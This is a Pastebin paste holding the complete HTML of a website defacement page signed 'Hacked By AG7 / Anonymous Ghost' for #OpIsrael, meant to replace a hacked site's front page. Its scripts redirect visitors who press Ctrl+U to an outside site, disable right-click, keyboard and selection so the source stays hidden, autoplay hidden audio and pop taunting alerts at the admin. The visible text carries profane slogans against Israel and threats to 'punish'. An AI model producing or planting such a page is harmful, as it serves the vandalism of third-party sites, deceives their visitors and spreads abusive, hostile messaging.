Advertisement
AG7ghost

Deface

Jun 17th, 2017
272
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.83 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Hacked By AG7</title><link REL="SHORTCUT ICON" HREF="http://dl.20script.ir/img/94/01/Anonymous.png">
  4. <style type="text/css">body {cursor:url("http://dl.20script.ir/img/94/01/Anonymous.png"),default}</style>
  5. <meta name="keywords" content="HAcked By AG7 Anonymous Ghost"/>
  6. <meta name="description" content="Anonymous Ghost">
  7. <meta name="author" content="Hacked? Hahahaha :)">
  8. <meta name="googlebot" content="all,index,follow">
  9. <meta name="robots" content="index, follow">
  10. </head>
  11. <script type='text/javascript'>
  12. //<![CDATA[
  13. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="http://www.shafou.com"});
  14. //]]>
  15. // -->
  16. //<![CDATA[
  17. msg = "..:: Anonymous Ghost ,,WAs HERE!!!::.. ";
  18. msg = ".:HBD For Me :'):." + msg;pos = 0;
  19. function scrollMSG() {
  20. document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
  21. if (pos > msg.length) pos = 0
  22. window.setTimeout("scrollMSG()",80);
  23. }
  24. scrollMSG();
  25. //]]></script>
  26. <script>
  27. // CREDITS:
  28. // Snowmaker Copyright (c) 2003 Peter Gehrig. All rights reserved.
  29. // Distributed by Hypergurl
  30. // Permission given to use the script provided that this notice remains as is.
  31.  
  32. // Set the number of snowflakes (more than 30 - 40 not recommended)
  33. var snowmax=35
  34.  
  35. // Set the colors for the snow. Add as many colors as you like
  36. var snowcolor=new Array("#aaaacc","#ddddFF","#ccccDD")
  37.  
  38. // Set the fonts, that create the snowflakes. Add as many fonts as you like
  39. var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
  40.  
  41. // Set the letter that creates your snowflake (recommended:*)
  42. var snowletter="-"
  43.  
  44. // Set the speed of sinking (recommended values range from 0.3 to 2)
  45. var sinkspeed=0.6
  46.  
  47. // Set the maximal-size of your snowflaxes
  48. var snowmaxsize=22
  49.  
  50. // Set the minimal-size of your snowflaxes
  51. var snowminsize=8
  52.  
  53. // Set the snowing-zone
  54. // Set 1 for all-over-snowing, set 2 for left-side-snowing
  55. // Set 3 for center-snowing, set 4 for right-side-snowing
  56. var snowingzone=1
  57.  
  58. ///////////////////////////////////////////////////////////////////////////
  59. // CONFIGURATION ENDS HERE
  60. ///////////////////////////////////////////////////////////////////////////
  61.  
  62.  
  63. // Do not edit below this line
  64. var snow=new Array()
  65. var marginbottom
  66. var marginright
  67. var timer
  68. var i_snow=0
  69. var x_mv=new Array();
  70. var crds=new Array();
  71. var lftrght=new Array();
  72. var browserinfos=navigator.userAgent
  73. var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
  74. var ns6=document.getElementById&&!document.all
  75. var opera=browserinfos.match(/Opera/)
  76. var browserok=ie5||ns6||opera
  77.  
  78. function randommaker(range) {
  79. rand=Math.floor(range*Math.random())
  80. return rand
  81. }
  82.  
  83. function initsnow() {
  84. if (ie5 || opera) {
  85. marginbottom = document.body.clientHeight
  86. marginright = document.body.clientWidth
  87. }
  88. else if (ns6) {
  89. marginbottom = window.innerHeight
  90. marginright = window.innerWidth
  91. }
  92. var snowsizerange=snowmaxsize-snowminsize
  93. for (i=0;i<=snowmax;i++) {
  94. crds[i] = 0;
  95. lftrght[i] = Math.random()*15;
  96. x_mv[i] = 0.03 + Math.random()/10;
  97. snow[i]=document.getElementById("s"+i)
  98. snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
  99. snow[i].size=randommaker(snowsizerange)+snowminsize
  100. snow[i].style.fontSize=snow[i].size
  101. snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
  102. snow[i].sink=sinkspeed*snow[i].size/5
  103. if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
  104. if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
  105. if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
  106. if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
  107. snow[i].posy=randommaker(6*marginbottom-marginbottom-6*snow[i].size)
  108. snow[i].style.left=snow[i].posx
  109. snow[i].style.top=snow[i].posy
  110. }
  111. movesnow()
  112. }
  113.  
  114. function movesnow() {
  115. for (i=0;i<=snowmax;i++) {
  116. crds[i] += x_mv[i];
  117. snow[i].posy+=snow[i].sink
  118. snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
  119. snow[i].style.top=snow[i].posy
  120.  
  121. if (snow[i].posy>=marginbottom-6*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
  122. if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
  123. if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
  124. if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
  125. if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
  126. snow[i].posy=0
  127. }
  128. }
  129. var timer=setTimeout("movesnow()",50)
  130. }
  131.  
  132. for (i=0;i<=snowmax;i++) {
  133. document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
  134. }
  135. if (browserok) {
  136. window.onload=initsnow
  137. }
  138. </script>
  139. <style type="text/css">
  140. caur {
  141. font-weight:755px;
  142. font-size:30px;
  143. background:transparent;
  144. color:#fff;
  145. text-shadow:
  146. 0 0 3px #F70000,
  147. 0 0 5px #F70000,
  148. 0 0 9px #F70000,
  149. 0 0 20px #F70000,
  150. 0 0 25px #F70000,
  151. 0 0 30px #F70000,
  152. 0 0 40px #F70000;
  153. }
  154.  
  155. b {
  156. font-weight:755px;
  157. font-size:40px;
  158. background:transparent;
  159. color:#fff;
  160. text-shadow:
  161. 0 0 3px #F70000,
  162. 0 0 5px #F70000,
  163. 0 0 9px #F70000,
  164. 0 0 20px #F70000,
  165. 0 0 25px #F70000,
  166. 0 0 30px #f70000,
  167. 0 0 40px #f70000;
  168. }
  169. hr {
  170. border:0;
  171. height:1px;
  172. background-image:linear-gradient(to right,rgba(0,0,0,0),rgb(255, 0, 0),rgba(0,0,0,0))
  173. }
  174.  
  175. body, a:hover
  176. {cursor: url(http://cur.cursors-4u.net/cursors/cur-2/cur116.cur), progress;}
  177.  
  178. .textmetalic { text-align: center; font-size: 47px; color: transparent; letter-spacing: 0px;}
  179. .textmetalic span { text-shadow: 0 0 2px rgba(204, 208, 212,0.9), 0 15px 25px rgba(0, 0, 0, 0.3), 0 2px 3px rgba(0, 0, 0, 0.1), 0 5px 10px rgba(255, 255, 255, 0.5), 0 5px 10px rgba(0, 0, 0, 0.3), 0 3px 4px rgba(255, 255, 255, 0.2), 0 0 20px rgba(255, 255, 255, 0.45); animation: loading 1.2s ease-in-out infinite alternate; }
  180. @keyframes loading { to { text-shadow: 0 0 2px rgba(204, 208, 212,0.2), 0 0 3px rgba(0, 0, 0, 0.02), 0 0 0 rgba(0, 0, 0, 0), 0 0 0 rgba(255, 255, 255, 0), 0 0 0 rgba(0, 0, 0, 0), 0 0 0 rgba(255, 255, 255, 0), 0 0 0 rgba(255, 255, 255, 0);} }
  181. .textmetalic span:nth-child(2) { animation-delay:0.2s; }
  182. .textmetalic span:nth-child(3) { animation-delay:0.4s; }
  183. .textmetalic span:nth-child(4) { animation-delay:0.6s; }
  184. .textmetalic span:nth-child(5) { animation-delay:0.8s; }
  185. .textmetalic span:nth-child(6) { animation-delay:1s; }
  186. .textmetalic span:nth-child(7) { animation-delay:1.2s; }
  187. body {cursor:cross;
  188. background: #000000 url();
  189.  
  190. }
  191. </style>
  192. <center><iframe width="0" height="0" src="https://www.youtube.com/embed/da-y8IK4cS8?autoplay=1"></iframe>
  193. <table width="100%" height="70%">
  194. <tbody><tr><td align="center"><br><br>
  195. <hr width="40%" height="10%" color="black">
  196. <a href=" https://www.facebook.com/AnonymousGhost7 " target="_blank"><br>
  197. <img src="https://s11.postimg.org/py3uaaufn/AG7.gif?oh=2d3be60c72199b2694136a1f378f34ba&oe=59ABEAC4" width="300px" height="300px"
  198.  
  199.  
  200.  
  201. style="opacity:0.4;filter:alpha(opacity=40)"
  202. onmouseover="this.style.opacity=1;this.filters.alpha.opacity=100"
  203. onmouseout="this.style.opacity=0.4;this.filters.alpha.opacity=40"></a><br><br>
  204.  
  205. <font face="Courier" size="7" color=" #B22222 "> <width="70" height="70">[+] Hacked By AG7 [+]<width="70" height="70"><br>
  206. <font face="Courier" size="5" color="White">[ <script>
  207.  
  208. var text="WE ARE ANONYMOUS GHOST " // YOUR TEXT
  209. var speed=120 // SPEED OF FADE
  210.  
  211.  
  212. if (document.all||document.getElementById){
  213. document.write('<span id="highlight">' + text + '</span>')
  214. var storetext=document.getElementById? document.getElementById("highlight") : document.all.highlight
  215. }
  216. else
  217. document.write(text)
  218. var hex=new Array("00","14","28","3C","50","64","78","8C","A0","B4","C8","DC","F0")
  219. var r=1
  220. var g=1
  221. var b=1
  222. var seq=1
  223. function changetext(){
  224. rainbow="#"+hex[r]+hex[g]+hex[b]
  225. storetext.style.color=rainbow
  226. }
  227. function change(){
  228. if (seq==6){
  229. b--
  230. if (b==0)
  231. seq=1
  232. }
  233. if (seq==5){
  234. r++
  235. if (r==12)
  236. seq=6
  237. }
  238. if (seq==4){
  239. g--
  240. if (g==0)
  241. seq=5
  242. }
  243. if (seq==3){
  244. b++
  245. if (b==12)
  246. seq=4
  247. }
  248. if (seq==2){
  249. r--
  250. if (r==0)
  251. seq=3
  252. }
  253. if (seq==1){
  254. g++
  255. if (g==12)
  256. seq=2
  257. }
  258. changetext()
  259. }
  260. function starteffect(){
  261. if (document.all||document.getElementById)
  262. flash=setInterval("change()",speed)
  263. }
  264. starteffect()
  265. </script> ]
  266. <br>
  267. <font face="Courier" size="4" color="white">
  268. <br>
  269. <center> >> #Opisrael :') > Anonymous Ghost << </center> Free Palestine
  270. <br>
  271. <marquee direction="right">[ AG7 ]-[ Black Python-AG ]-[ MR.Ddos ]-[Cyber Mentor]-[AR59]-[J!hAn] [ And All Anonymous Ghost Members ]</marquee>
  272. <br>
  273. <marquee direction="left">>>> No System Is Safe - Fuck You iSrael - Free Palestine - We Here To Punish You <<<</marquee>
  274. <br>
  275. <hr width="40%" height="10%" color="black">
  276. <font face="Courier" size="4" color="black">
  277.  
  278. </font></font></font></td></tr>
  279. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
  280. </tbody>
  281. </table>
  282. <script>
  283. var message="Free Palestine";
  284. ///////////////////////////////////
  285. function clickIE4(){if (event.button==2){alert(message);return false;}}
  286. function clickNS4(e){if (document.layers||document.getElementById&&!document.all){if (e.which==2||e.which==3){alert(message);return false;}}}
  287. if (document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS4;}
  288. else if (document.all&&!document.getElementById){document.onmousedown=clickIE4;}
  289. document.oncontextmenu=new Function("alert(message);return false")</script>
  290. </center>
  291. <script>alert('Hello Admin :)')</script>
  292. <script>alert('So HAve Fun, AG7 :)')</script>
  293. <script>alert('israel It's Too Late To Expect Us')</script>
  294. <script>alert('We Are ANonymous Ghost')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement